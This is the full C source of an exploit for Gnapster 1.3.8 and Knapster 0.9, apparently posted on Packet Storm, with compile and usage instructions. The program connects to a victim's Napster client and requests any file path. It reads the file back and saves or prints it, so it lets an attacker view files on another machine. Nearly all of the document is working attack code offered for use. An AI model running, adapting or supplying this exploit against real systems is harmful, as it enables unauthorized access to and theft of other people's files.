Gnapster 1.3.8 and Knapster 0.9 remote view file exploit.
53c82a8e2d27ddb652a607c8842ffdc06767db6dc99711ae7c83b0e6575c08d9/*
Gnapster/Knapster View File 'Xploit' by wildcoyote@coders-pt.org
Check advisorie at www.securityfocus.com (bugtraq ID #1186)
Compile with : gcc Xnapster.c -o Xnapster
Sintaxe : ./Xnapster <host> <filename> [port] [username] [file_to_log_to]
The default port is 6699, the username is "nobody" and the
default file_to_log_to is STDOUT :]
Wordz : This generation'rulez thi'nation!
*/
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
int
openhost(char *host,int port) {
int sock;
struct sockaddr_in addr;
struct hostent *he;
he=gethostbyname(host);
if (he==NULL) return -1;
sock=socket(AF_INET, SOCK_STREAM, getprotobyname("tcp")->p_proto);
if (sock==-1) return -1;
memcpy(&addr.sin_addr, he->h_addr, he->h_length);
addr.sin_family=AF_INET;
addr.sin_port=htons(port);
if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1) return -1;
return sock;
}
void // send the buffer to the opened'socket
sends(int sock,char *buf) {
write(sock,buf,strlen(buf));
}
void
getfile(char *host, char *filename, int port, char *username, char *logto)
{
FILE *fx;
int sock, i, read_test=0;
char buf[512];
printf("Trying to connect to %s [%d]...",host,port);
sock=openhost(host,port);
if (sock==-1)
{
printf("FAILED\n");
printf("Exiting...\n\n");
exit(-1);
}
printf("SUCCESSFULL\n");
for(i=0;i<strlen(filename);i++) if (filename[i]=='/') filename[i]='\\';
printf("Sending request...\n");
snprintf(buf,sizeof(buf),"GET%s \"%s\" 0\n\n",username,filename);
sends(sock,buf);
printf("Logging to ");
if (logto==NULL) printf("<STDOUT>\n");
else printf("%s\n",logto);
while(read_test!=-1)
{
read_test=read(sock,buf,256);
if ((strstr(buf,"FILE NOT FOUND"))!=NULL)
{
printf("Sorry! The client returned \"FILE NOT FOUND\" when requesting %s ...\n",filename);
printf("Exiting...\n\n");
exit(-1);
}
if ((strstr(buf,"NOT SHARED"))!=NULL)
{
printf("Sorry! The client returned \"NOT SHARED\" when requesting %s ...\n",filename);
printf("Exiting...\n\n");
exit(-1);
}
if (logto!=NULL)
{
fx=fopen(logto,"a");
fprintf(fx,"%s",buf);
fclose(fx);
}
else puts(buf);
}
if (logto!=NULL) printf("File saved to %s ;)\n",logto);
printf("All done! :]\n\n");
}
main(int argc, char *argv[])
{
printf("\nGnapster/Knapster View File 'Xploit' by wildcoyote@coders-pt.org\n\n");
if (argc<3)
{
printf("Sintaxe: %s <host> <file> [port] [username] [log_to_file]\n",argv[0]);
printf("Example: %s 192.168.0.1 /whatever\n",argv[0]);
printf("Default port is 6699 and the default user is \"nobody\"\n\n");
printf("If the last argument is defined, i'll write the remote file to it!\n");
printf("Else, i'll write to STDOUT ;)\n\n");
}
else if (argc==3) getfile(argv[1],argv[2],6699,"nobody",NULL);
else if (argc==4) getfile(argv[1],argv[2],atoi(argv[3]),"nobody",NULL);
else if (argc==5) getfile(argv[1],argv[2],atoi(argv[3]),argv[4],NULL);
else getfile(argv[1],argv[2],atoi(argv[3]),argv[4],argv[5]);
}
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed